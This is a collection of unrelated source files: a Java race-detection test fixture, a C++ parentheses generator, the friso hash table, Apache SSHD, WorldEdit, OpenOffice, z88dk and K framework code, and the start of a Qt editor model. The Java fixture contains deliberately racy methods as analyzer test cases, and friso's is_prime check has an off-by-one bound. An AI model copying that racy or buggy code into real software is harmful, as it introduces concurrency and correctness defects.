    name1[2] = 4;
  }

  // although name1 and name2 may alias, we have no reason to think that they will. don't report
  int FN_arrayParameterReadBad(int[] name2) {
    return name2[2];
  }

  int arrayParameterLiteralReadOk() {
    return (new int[] {2, 3})[1];
  }

  public void writeWriteRaceBad(String s) {
    strArr1[2] = s;
  }

  // same array
  public String readWriteRaceBad(String s) {
    synchronized (this) {
      strArr1[2] = s;
    }
    return strArr1[2];
  }

  // arrays are same type, but can't alias
  public String notReadWriteRace1Ok(String s) {
    synchronized (this) {
      strArr1[0] = s;
    }
    return strArr2[0];
  }

  // arrays are compatible types and can alias
  public Child FN_readWriteAliasRaceBad() {
    synchronized (this) {
      parentArr[3] = null;
    }
    return childArr[3];
  }

  String[] type1Arr[];
  Parent[] type2Arr;

  // arrays are different types and thus cannot alias
  public Parent noRaceOk() {
    synchronized (this) {
      type1Arr[3] = null;
    }
    return type2Arr[3];
  }
}
616
1,253
#include <bits/stdc++.h>
using namespace std;

// Recursively builds all balanced parenthesis strings.
// A   = number of '(' still available to place
// cur = number of currently unmatched '(' in st
void call(vector<string>& ans, string st, int A, int cur) {
    if (cur == 0 && A == 0) {            // everything placed and matched
        ans.push_back(st);
        return;
    }
    if (cur == 0) {                      // nothing open: must open a new '('
        st += '(';
        call(ans, st, A - 1, 1);
        return;
    }
    if (A) {                             // may either open another '(' or close one
        call(ans, st + '(', A - 1, cur + 1);
        call(ans, st + ')', A, cur - 1);
        return;
    }
    while (cur) {                        // no '(' left: close all open brackets
        st += ')';
        cur--;
    }
    ans.push_back(st);
}

vector<string> generateParenthesis(int A) {
    vector<string> ans;
    string st;
    call(ans, st, A, 0);
    return ans;
}

int main() {
    cout << "Enter the number: ";
    int n;
    cin >> n;
    vector<string> ans = generateParenthesis(n);
    for (size_t i = 0; i < ans.size(); i++)
        cout << "Valid parenthesis: " << ans[i] << endl;
}
470
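As a quick sanity check on the generator above: for n pairs of parentheses the number of valid strings is the nth Catalan number (1, 2, 5, 14, ...). The short standalone snippet below computes those counts from the usual recurrence so they can be compared against the size of the vector returned by generateParenthesis(n); it is an illustration added here, not part of the original file.

// Catalan numbers: expected count of balanced strings for n pairs.
#include <cstdint>
#include <iostream>

int main() {
    std::uint64_t c = 1;                         // C(0)
    for (int k = 0; k < 10; ++k) {
        c = c * 2 * (2 * k + 1) / (k + 2);       // now c == C(k + 1), division is exact
        std::cout << "n=" << (k + 1) << ": " << c << " valid strings\n";
    }
    return 0;
}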
376
<reponame>alphavip/friso /* * friso hash table functions implementation defined in header file "friso_API.h". * @author lionsoul<<EMAIL>> */ #include "friso_API.h" #include <stdlib.h> #include <string.h> //-166411799L //31 131 1331 13331 133331 .. //31 131 1313 13131 131313 .. the best #define HASH_FACTOR 1313131 /* ************************ * mapping function area * **************************/ __STATIC_API__ uint_t hash( fstring str, uint_t length ) { //hash code uint_t h = 0; while ( *str != '\0' ) { h = h * HASH_FACTOR + ( *str++ ); } return (h % length); } /*test if a integer is a prime.*/ __STATIC_API__ int is_prime( int n ) { int j; if ( n == 2 || n == 3 ) { return 1; } if ( n == 1 || n % 2 == 0 ) { return 0; } for ( j = 3; j * j < n; j++ ) { if ( n % j == 0 ) { return 0; } } return 1; } /*get the next prime just after the speicified integer.*/ __STATIC_API__ int next_prime( int n ) { if ( n % 2 == 0 ) n++; for ( ; ! is_prime( n ); n = n + 2 ) ; return n; } //fstring copy, return the pointer of the new string. //static fstring string_copy( fstring _src ) { //int bytes = strlen( _src ); //fstring _dst = ( fstring ) FRISO_MALLOC( bytes + 1 ); //register int t = 0; //do { //_dst[t] = _src[t]; //t++; //} while ( _src[t] != '\0' ); //_dst[t] = '\0'; //return _dst; //} /* ********************************* * static hashtable function area. * ***********************************/ __STATIC_API__ hash_entry_t new_hash_entry( fstring key, void * value, hash_entry_t next ) { hash_entry_t e = ( hash_entry_t ) FRISO_MALLOC( sizeof( friso_hash_entry ) ); if ( e == NULL ) { ___ALLOCATION_ERROR___ } //e->_key = string_copy( key ); e->_key = key; e->_val = value; e->_next = next; return e; } //create blocks copy of entries. __STATIC_API__ hash_entry_t * create_hash_entries( uint_t blocks ) { register uint_t t; hash_entry_t *e = ( hash_entry_t * ) FRISO_CALLOC( sizeof( hash_entry_t ), blocks ); if ( e == NULL ) { ___ALLOCATION_ERROR___ } for ( t = 0; t < blocks; t++ ) { e[t] = NULL; } return e; } //a static function to do the re-hash work. __STATIC_API__ void rebuild_hash( friso_hash_t _hash ) { //printf("rehashed.\n"); //find the next prime as the length of the hashtable. uint_t t, length = next_prime( _hash->length * 2 + 1 ); hash_entry_t e, next, *_src = _hash->table, \ *table = create_hash_entries( length ); uint_t bucket; //copy the nodes for ( t = 0; t < _hash->length; t++ ) { e = *( _src + t ); if ( e != NULL ) { do { next = e->_next; bucket = hash( e->_key, length ); e->_next = table[bucket]; table[bucket] = e; e = next; } while ( e != NULL ); } } _hash->table = table; _hash->length = length; _hash->threshold = ( uint_t ) ( _hash->length * _hash->factor ); //free the old hash_entry_t blocks allocations. FRISO_FREE( _src ); } /* ******************************** * hashtable interface functions. * * ********************************/ //create a new hash table. 
FRISO_API friso_hash_t new_hash_table( void ) { friso_hash_t _hash = ( friso_hash_t ) FRISO_MALLOC( sizeof ( friso_hash_cdt ) ); if ( _hash == NULL ) { ___ALLOCATION_ERROR___ } //initialize the the hashtable _hash->length = DEFAULT_LENGTH; _hash->size = 0; _hash->factor = DEFAULT_FACTOR; _hash->threshold = ( uint_t ) ( _hash->length * _hash->factor ); _hash->table = create_hash_entries( _hash->length ); return _hash; } FRISO_API void free_hash_table( friso_hash_t _hash, fhash_callback_fn_t fentry_func ) { register uint_t j; hash_entry_t e, n; for ( j = 0; j < _hash->length; j++ ) { e = *( _hash->table + j ); for ( ; e != NULL ; ) { n = e->_next; if ( fentry_func != NULL ) fentry_func(e); FRISO_FREE( e ); e = n; } } //free the pointer array block ( 4 * htable->length continuous bytes ). FRISO_FREE( _hash->table ); FRISO_FREE( _hash ); } //put a new mapping insite. //the value cannot be NULL. FRISO_API void *hash_put_mapping( friso_hash_t _hash, fstring key, void * value ) { uint_t bucket = ( key == NULL ) ? 0 : hash( key, _hash->length ); hash_entry_t e = *( _hash->table + bucket ); void *oval = NULL; //check the given key is already exists or not. for ( ; e != NULL; e = e->_next ) { if ( key == e->_key || ( key != NULL && e->_key != NULL && strcmp( key, e->_key ) == 0 ) ) { oval = e->_val; //bak the old value e->_key = key; e->_val = value; return oval; } } //put a new mapping into the hashtable. _hash->table[bucket] = new_hash_entry( key, value, _hash->table[bucket] ); _hash->size++; //check the condition to rebuild the hashtable. if ( _hash->size >= _hash->threshold ) { rebuild_hash( _hash ); } return oval; } //check the existence of the mapping associated with the given key. FRISO_API int hash_exist_mapping( friso_hash_t _hash, fstring key ) { uint_t bucket = ( key == NULL ) ? 0 : hash( key, _hash->length ); hash_entry_t e; for ( e = *( _hash->table + bucket ); e != NULL; e = e->_next ) { if ( key == e->_key || ( key != NULL && e->_key != NULL && strcmp( key, e->_key ) == 0 )) { return 1; } } return 0; } //get the value associated with the given key. FRISO_API void *hash_get_value( friso_hash_t _hash, fstring key ) { uint_t bucket = ( key == NULL ) ? 0 : hash( key, _hash->length ); hash_entry_t e; for ( e = *( _hash->table + bucket ); e != NULL; e = e->_next ) { if ( key == e->_key || ( key != NULL && e->_key != NULL && strcmp( key, e->_key ) == 0 )) { return e->_val; } } return NULL; } //remove the mapping associated with the given key. FRISO_API hash_entry_t hash_remove_mapping( friso_hash_t _hash, fstring key ) { uint_t bucket = ( key == NULL ) ? 0 : hash( key, _hash->length ); hash_entry_t e, prev = NULL; hash_entry_t b; for ( e = *( _hash->table + bucket ); e != NULL; prev = e, e = e->_next ) { if ( key == e->_key || ( key != NULL && e->_key != NULL && strcmp( key, e->_key ) == 0 ) ) { b = e; //the node located at *( htable->table + bucket ) if ( prev == NULL ) { _hash->table[bucket] = e->_next; } else { prev->_next = e->_next; } //printf("%s was removed\n", b->_key); _hash->size--; //FRISO_FREE( b ); return b; } } return NULL; } //count the size.(A macro define has replace this.) //FRISO_API uint_t hash_get_size( friso_hash_t _hash ) { // return _hash->size; //}
3,404
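The friso source above documents its bucket mapping and prime-sized table growth mainly through comments. The standalone C++ snippet below re-implements just that mapping logic (the multiplicative string hash with factor 1313131, reduced modulo a prime table length found by stepping odd numbers) so the behaviour can be tried in isolation. It is a paraphrase for illustration, not the library's API, and the primality test uses the tighter bound j * j <= n.

// Standalone re-sketch of friso's bucket mapping.
#include <cstdint>
#include <iostream>
#include <string>

static std::uint32_t bucket_of(const std::string& key, std::uint32_t table_len) {
    std::uint32_t h = 0;
    for (unsigned char c : key)
        h = h * 1313131u + c;            // same factor as HASH_FACTOR above
    return h % table_len;
}

static bool is_prime(int n) {
    if (n == 2 || n == 3) return true;
    if (n < 2 || n % 2 == 0) return false;
    for (int j = 3; j * j <= n; j += 2)
        if (n % j == 0) return false;
    return true;
}

// Smallest odd prime not less than n, mirroring next_prime() above.
static int next_prime(int n) {
    if (n % 2 == 0) ++n;
    while (!is_prime(n)) n += 2;
    return n;
}

int main() {
    int len = next_prime(31);
    std::cout << "table length: " << len << '\n';
    for (const char* w : {"friso", "hash", "table"})
        std::cout << w << " -> bucket " << bucket_of(w, len) << '\n';
    return 0;
}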
501
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.sshd.cli.server.helper; import java.io.IOException; import java.nio.file.Path; import java.nio.file.attribute.PosixFilePermission; import java.util.Set; import org.apache.sshd.common.session.Session; import org.apache.sshd.scp.common.ScpTransferEventListener; import org.apache.sshd.scp.common.helpers.ScpAckInfo; import org.apache.sshd.scp.server.ScpCommandFactory; import org.slf4j.Logger; /** * @author <a href="mailto:<EMAIL>">Apache MINA SSHD Project</a> */ public class ScpCommandTransferEventListener extends ServerEventListenerHelper implements ScpTransferEventListener { public ScpCommandTransferEventListener(Logger logger) { super(ScpCommandFactory.SCP_FACTORY_NAME, logger); } @Override public void startFileEvent( Session session, FileOperation op, Path file, long length, Set<PosixFilePermission> perms) throws IOException { if (log.isInfoEnabled()) { log.info("startFileEvent({})[{}] len={}, perms={}: {}", session, op, length, perms, file); } } @Override public void endFileEvent( Session session, FileOperation op, Path file, long length, Set<PosixFilePermission> perms, Throwable thrown) throws IOException { if (thrown != null) { log.error("endFileEvent({})[{}] failed ({}) len={}, perms={} [{}]: {}", session, op, thrown.getClass().getSimpleName(), length, perms, file, thrown.getMessage()); } else if (log.isInfoEnabled()) { log.info("endFileEvent({})[{}] len={}, perms={}: {}", session, op, length, perms, file); } } @Override public void startFolderEvent(Session session, FileOperation op, Path file, Set<PosixFilePermission> perms) throws IOException { if (log.isInfoEnabled()) { log.info("startFolderEvent({})[{}] perms={}: {}", session, op, perms, file); } } @Override public void endFolderEvent( Session session, FileOperation op, Path file, Set<PosixFilePermission> perms, Throwable thrown) throws IOException { if (thrown != null) { log.error("endFolderEvent({})[{}] failed ({}) perms={} [{}]: {}", session, op, thrown.getClass().getSimpleName(), perms, file, thrown.getMessage()); } else if (log.isInfoEnabled()) { log.info("endFolderEvent({})[{}] perms={}: {}", session, op, perms, file); } } @Override public void handleFileEventAckInfo( Session session, FileOperation op, Path file, long length, Set<PosixFilePermission> perms, ScpAckInfo ackInfo) throws IOException { if (log.isInfoEnabled()) { log.info("handleFileEventAckInfo({})[{}] perms={}, length={}, ACK={}: {}", session, op, perms, length, ackInfo, file); } } }
1,418
682
<reponame>sk89q/WorldEdit /* * WorldEdit, a Minecraft world manipulation toolkit * Copyright (C) sk89q <http://www.sk89q.com> * Copyright (C) WorldEdit team and contributors * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ package com.sk89q.worldedit.sponge; import com.sk89q.worldedit.world.registry.BlockMaterial; import com.sk89q.worldedit.world.registry.PassthroughBlockMaterial; import net.minecraft.world.level.block.state.BlockState; import net.minecraft.world.level.material.Material; import net.minecraft.world.level.material.PushReaction; import javax.annotation.Nullable; /** * Sponge block material that pulls as much info as possible from the Minecraft * Material, and passes the rest to another implementation, typically the * bundled block info. */ public class SpongeBlockMaterial extends PassthroughBlockMaterial { private final Material delegate; private final BlockState block; public SpongeBlockMaterial(Material delegate, BlockState block, @Nullable BlockMaterial secondary) { super(secondary); this.delegate = delegate; this.block = block; } @Override public boolean isAir() { return delegate == Material.AIR || super.isAir(); } @Override public boolean isOpaque() { return delegate.isSolidBlocking(); } @Override public boolean isLiquid() { return delegate.isLiquid(); } @Override public boolean isSolid() { return delegate.isSolid(); } @Override public boolean isFragileWhenPushed() { return delegate.getPushReaction() == PushReaction.DESTROY; } @Override public boolean isUnpushable() { return delegate.getPushReaction() == PushReaction.BLOCK; } @Override public boolean isMovementBlocker() { return delegate.blocksMotion(); } @Override public boolean isBurnable() { return delegate.isFlammable(); } @Override public boolean isToolRequired() { return block.requiresCorrectToolForDrops(); } @Override public boolean isReplacedDuringPlacement() { return delegate.isReplaceable(); } }
888
679
<reponame>Grosskopf/openoffice<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef INCLUDED_SLIDESHOW_ACTIVITIESFACTORY_HXX #define INCLUDED_SLIDESHOW_ACTIVITIESFACTORY_HXX #include <com/sun/star/animations/XAnimate.hpp> #include <com/sun/star/animations/XAnimateColor.hpp> #include "animationactivity.hxx" #include "activitiesqueue.hxx" #include "event.hxx" #include "eventqueue.hxx" #include "shape.hxx" #include "numberanimation.hxx" #include "enumanimation.hxx" #include "coloranimation.hxx" #include "hslcoloranimation.hxx" #include "stringanimation.hxx" #include "boolanimation.hxx" #include "pairanimation.hxx" #include <boost/optional.hpp> #include <boost/utility.hpp> /* Definition of ActivitiesFactory class */ namespace slideshow { namespace internal { class ActivitiesFactory : private ::boost::noncopyable { public: /// Collection of common factory parameters struct CommonParameters { CommonParameters( const EventSharedPtr& rEndEvent, EventQueue& rEventQueue, ActivitiesQueue& rActivitiesQueue, double nMinDuration, sal_uInt32 nMinNumberOfFrames, bool bAutoReverse, ::boost::optional<double> const& aRepeats, double nAcceleration, double nDeceleration, const ShapeSharedPtr& rShape, const ::basegfx::B2DVector& rSlideBounds ) : mpEndEvent( rEndEvent ), mrEventQueue( rEventQueue ), mrActivitiesQueue( rActivitiesQueue ), mnMinDuration( nMinDuration ), mnMinNumberOfFrames( nMinNumberOfFrames ), maRepeats( aRepeats ), mnAcceleration( nAcceleration ), mnDeceleration( nDeceleration ), mpShape( rShape ), maSlideBounds( rSlideBounds ), mbAutoReverse( bAutoReverse ) {} /// End event to fire when animation is over EventSharedPtr mpEndEvent; /// Event queue to insert the end event into. EventQueue& mrEventQueue; /// Event queue to insert the end event into. ActivitiesQueue& mrActivitiesQueue; /** Simple duration of the activity Specifies the minimal simple duration of the activity (minimal, because mnMinNumberOfFrames might prolongue the activity). According to SMIL, this might also be indefinite, which for our framework does not make much sense, though (wouldn't have a clue, then, how to scale the animation over time). */ double mnMinDuration; /** Minimal number of frames for this activity. This specifies the minimal number of frames this activity will display per simple duration. If less than this number are displayed until mnMinDuration is over, the activity will be prolongued until mnMinNumberOfFrames are rendered. */ sal_uInt32 mnMinNumberOfFrames; /** Number of repeats for the simple duration This specified the number of repeats. The mnMinDuration times maRepeats yields the total duration of this activity. 
If this value is unspecified, the activity will repeat indefinitely. */ ::boost::optional<double> const maRepeats; /// Fraction of simple time to accelerate animation double mnAcceleration; /// Fraction of simple time to decelerate animation double mnDeceleration; /// Shape, to get bounds from ShapeSharedPtr mpShape; /// LayerManager, to get page size from ::basegfx::B2DVector maSlideBounds; /// When true, activity is played reversed after mnDuration. bool mbAutoReverse; }; /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a double value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const NumberAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a double value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const EnumAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a color value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const ColorAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a color value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const HSLColorAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimateColor >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a pair of double values. 
@param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const PairAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a string. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const StringAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a bool value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const BoolAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create a simple activity for the given animator This method is suited to create activities for custom animations, which need a simple double value and lasts a given timespan. This activity always generates values from the [0,1] range. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param bDirectionForward If true, the activity goes 'forward', i.e. from 0 to 1. With false, the direction is reversed. */ static AnimationActivitySharedPtr createSimpleActivity( const CommonParameters& rParms, const NumberAnimationSharedPtr& rAnimator, bool bDirectionForward ); private: // default: constructor/destructor disabed ActivitiesFactory(); ~ActivitiesFactory(); }; } // namespace internal } // namespace presentation #endif /* INCLUDED_SLIDESHOW_ACTIVITIESFACTORY_HXX */
5,500
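CommonParameters above carries mnAcceleration and mnDeceleration as fractions of the simple duration. The snippet below is a standalone sketch of the standard SMIL-style time warp that such fractions usually denote (speed ramps up over the first accel of the interval and down over the last decel); it is written from the SMIL definition rather than extracted from the slideshow engine, so treat it as an illustration of the concept, not the engine's exact code.

// SMIL acceleration/deceleration time warp; input and output are in [0,1].
#include <cassert>
#include <cstdio>

double warp(double t, double accel, double decel) {
    assert(accel >= 0.0 && decel >= 0.0 && accel + decel <= 1.0);
    const double peak = 1.0 / (1.0 - accel / 2.0 - decel / 2.0);   // peak speed
    if (t < accel)                       // ramping up
        return peak * t * t / (2.0 * accel);
    if (t <= 1.0 - decel)                // cruising at peak speed
        return peak * (accel / 2.0 + (t - accel));
    const double u = t - (1.0 - decel);  // ramping down
    return peak * (accel / 2.0 + (1.0 - accel - decel) + u - u * u / (2.0 * decel));
}

int main() {
    // With 30% acceleration and 30% deceleration the warped time still runs
    // from 0 to 1, but moves slowly near both ends of the interval.
    for (double t = 0.0; t <= 1.0001; t += 0.25)
        std::printf("t=%.2f -> %.3f\n", t, warp(t, 0.3, 0.3));
    return 0;
}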
335
<gh_stars>100-1000 package moze_intel.projecte.rendering.entity; import javax.annotation.Nonnull; import moze_intel.projecte.PECore; import moze_intel.projecte.gameObjs.entity.EntityWaterProjectile; import net.minecraft.client.renderer.entity.EntityRendererManager; import net.minecraft.util.ResourceLocation; public class WaterOrbRenderer extends EntitySpriteRenderer<EntityWaterProjectile> { public WaterOrbRenderer(EntityRendererManager manager) { super(manager); } @Nonnull @Override public ResourceLocation getEntityTexture(@Nonnull EntityWaterProjectile entity) { return PECore.rl("textures/entity/water_orb.png"); } }
207
404
<reponame>nrdxp/k // Copyright (c) 2018-2019 K Team. All Rights Reserved. package org.kframework.compile; import org.kframework.attributes.Att; import org.kframework.builtin.KLabels; import org.kframework.builtin.Sorts; import org.kframework.builtin.BooleanUtils; import org.kframework.definition.Context; import org.kframework.definition.Module; import org.kframework.definition.Rule; import org.kframework.definition.Sentence; import org.kframework.kore.*; import java.util.HashMap; import java.util.HashSet; import java.util.Map; import java.util.Set; import static org.kframework.kore.KORE.*; public class MinimizeTermConstruction { private final Set<KVariable> vars = new HashSet<>(); private final Map<K, KVariable> cache = new HashMap<>(); private final Set<K> usedOnRhs = new HashSet<>(); private final Module module; public MinimizeTermConstruction(Module module) { this.module = module; } void resetVars() { vars.clear(); cache.clear(); usedOnRhs.clear(); counter = 0; } private Rule resolve(Rule rule) { if (rule.att().contains(Att.SIMPLIFICATION())) { return rule; } resetVars(); gatherVars(rule.body()); gatherVars(rule.requires()); gatherVars(rule.ensures()); gatherTerms(rule.body(), true); gatherTerms(rule.requires(), false); gatherTerms(rule.ensures(), false); filterTerms(rule.body(), true); filterTerms(rule.requires(), false); filterTerms(rule.ensures(), false); return new Rule( transform(rule.body(), true), transform(rule.requires(), false), transform(rule.ensures(), false), rule.att()); } private Context resolve(Context context) { resetVars(); gatherVars(context.body()); gatherVars(context.requires()); gatherTerms(context.body(), true); gatherTerms(context.requires(), false); filterTerms(context.body(), true); filterTerms(context.requires(), false); return new Context( transform(context.body(), true), transform(context.requires(), false), context.att()); } public synchronized Sentence resolve(Sentence s) { if (s instanceof Rule) { return resolve((Rule) s); } else if (s instanceof Context) { return resolve((Context) s); } else { return s; } } void gatherVars(K term) { new VisitK() { @Override public void apply(KVariable v) { vars.add(v); super.apply(v); } }.apply(term); } void gatherTerms(K term, boolean body) { AddSortInjections sorts = new AddSortInjections(module); new RewriteAwareVisitor(body, new HashSet<>()) { @Override public void apply(K k) { if (isLHS() && !isRHS() && !(k instanceof KVariable) && !atTop && !k.equals(BooleanUtils.TRUE)) { cache.put(k, newDotVariable(sorts.sort(k, Sorts.K()))); } atTop = false; super.apply(k); } boolean atTop = false; @Override public void apply(KRewrite rew) { if (rew == term) { atTop = true; } super.apply(rew); } @Override public void apply(KApply k) { if (k.klabel().head().equals(KLabels.ML_OR)) { return; } String hook = module.attributesFor().get(k.klabel()).getOrElse(() -> Att.empty()).getOptional("hook").orElse(""); if (hook.equals("SET.element") || hook.equals("LIST.element") || hook.equals("LIST.concat") || hook.equals("MAP.concat") || hook.equals("SET.concat")) { return; } if (hook.equals("MAP.element")) { apply(k.items().get(1)); return; } super.apply(k); } }.apply(term); } void filterTerms(K term, boolean body) { new RewriteAwareVisitor(body, new HashSet<>()) { @Override public void apply(K k) { if (isRHS() && !isLHS() && cache.containsKey(k)) { usedOnRhs.add(k); return; } super.apply(k); } }.apply(term); } K transform(K term, boolean body) { AddSortInjections sorts = new AddSortInjections(module); return new RewriteAwareTransformer(body) 
{ @Override public K apply(K k) { if (isRHS() && !isLHS()) { if (cache.containsKey(k)) { return cache.get(k); } } if (isLHS() && !isRHS() && !inBad) { if (usedOnRhs.contains(k)) { return KAs(super.apply(k), cache.get(k), Att.empty().add(Sort.class, cache.get(k).att().get(Sort.class))); } } return super.apply(k); } boolean inBad = false; @Override public K apply(KApply k) { boolean stack = inBad; if (k.klabel().head().equals(KLabels.ML_OR)) { inBad = true; } String hook = module.attributesFor().get(k.klabel()).getOrElse(() -> Att.empty()).getOptional("hook").orElse(""); if (hook.equals("SET.element") || hook.equals("LIST.element") || hook.equals("LIST.concat") || hook.equals("MAP.concat") || hook.equals("SET.concat")) { inBad = true; } if (hook.equals("MAP.element")) { inBad = true; K key = apply(k.items().get(0)); inBad = stack; K val = apply(k.items().get(1)); return KApply(k.klabel(), KList(key, val), k.att()); } K result = super.apply(k); inBad = stack; return result; } }.apply(term); } private int counter = 0; KVariable newDotVariable(Sort sort) { KVariable newLabel; do { newLabel = KVariable("_" + (counter++), Att().add(Sort.class, sort)); } while (vars.contains(newLabel)); vars.add(newLabel); return newLabel; } }
3,651
640
<reponame>jpoikela/z88dk double double_post_increment() { double x = 3.0; x++; return x; } double double_post_increment_assign() { double x = 3.0; double y; y = x++; return x; } double double_pre_increment() { double x = 3.0; ++x; return x; } double double_pre_increment_assign() { double x = 3.0; double y; y = ++x; return x; } double double_post_decrement() { double x = 3.0; x--; return x; } double double_post_decrement_assign() { double x = 3.0; double y; y = x--; return x; } double double_pre_decrement() { double x = 3.0; --x; return x; } double double_pre_decrement_assign() { double x = 3.0; double y; y = --x; return x; }
485
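The z88dk test above exercises double pre/post increment code generation but never states the values it expects. As a reminder of the semantics being tested, the snippet below spells out what each flavour should yield; this is plain ISO C/C++ behaviour, independent of the z88dk test harness.

// Expected semantics behind the double increment/decrement tests.
#include <cassert>

int main() {
    double x = 3.0, y;

    y = x++;                 // post-increment: y gets the old value
    assert(y == 3.0 && x == 4.0);

    x = 3.0;
    y = ++x;                 // pre-increment: y gets the new value
    assert(y == 4.0 && x == 4.0);

    x = 3.0;
    y = x--;                 // post-decrement: y gets the old value
    assert(y == 3.0 && x == 2.0);

    x = 3.0;
    y = --x;                 // pre-decrement: y gets the new value
    assert(y == 2.0 && x == 2.0);

    return 0;                // each test function returns x, so the increment
                             // variants should return 4.0 and the decrement
                             // variants 2.0
}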
1,738
/* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ // Original file Copyright Crytek GMBH or its affiliates, used under license. #include "StdAfx.h" #include "SequencerNode.h" #include "SequencerTrack.h" #include "MannequinNodes.h" #include "MannequinDialog.h" #include "SequencerSequence.h" #include "SequencerDopeSheet.h" #include "SequencerUndo.h" #include "StringDlg.h" #include "Clipboard.h" #include "ISequencerSystem.h" #include "Objects/EntityObject.h" #include "ViewManager.h" #include "RenderViewport.h" #include "SequencerTrack.h" #include "SequencerNode.h" #include "MannequinDialog.h" #include "FragmentTrack.h" #include <QHeaderView> #include <QMenu> #include <QMessageBox> #include <QMimeData> #include <QScrollBar> #define EDIT_DISABLE_GRAY_COLOR QColor(180, 180, 180) namespace { static const int MUTE_TRACK_ICON_UNMUTED = 18; static const int MUTE_TRACK_ICON_MUTED = 19; static const int MUTE_TRACK_ICON_SOLO = 20; static const int MUTE_NODE_ICON_UNMUTED = 21; static const int MUTE_NODE_ICON_MUTED = 22; static const int MUTE_NODE_ICON_SOLO = 23; } const int kIconFromParamID[SEQUENCER_PARAM_TOTAL] = {0, 0, 14, 3, 10, 13}; const int kIconFromNodeType[SEQUENCER_NODE_TOTAL] = {1, 1, 1, 1, 1, 2}; class MannNodesTreeModel : public QAbstractItemModel { public: MannNodesTreeModel(CMannNodesWidget* parent) : QAbstractItemModel(parent) , m_sequence(nullptr) , m_widget(parent) { } enum Role { NodeRole = Qt::UserRole, TrackRole }; QStringList mimeTypes() const override { return{ EditorDragDropHelpers::GetAnimationNameClipboardFormat(), QStringLiteral("application/x-mannequin-track-index")}; } QMimeData* mimeData(const QModelIndexList& indexes) const override { QMimeData* data = new QMimeData; QByteArray d; QDataStream stream(&d, QIODevice::WriteOnly); for (auto i : indexes) { if (i.column() == 0) { stream << i.row() << i.internalId(); } } data->setData(QStringLiteral("application/x-mannequin-track-index"), d); return data; 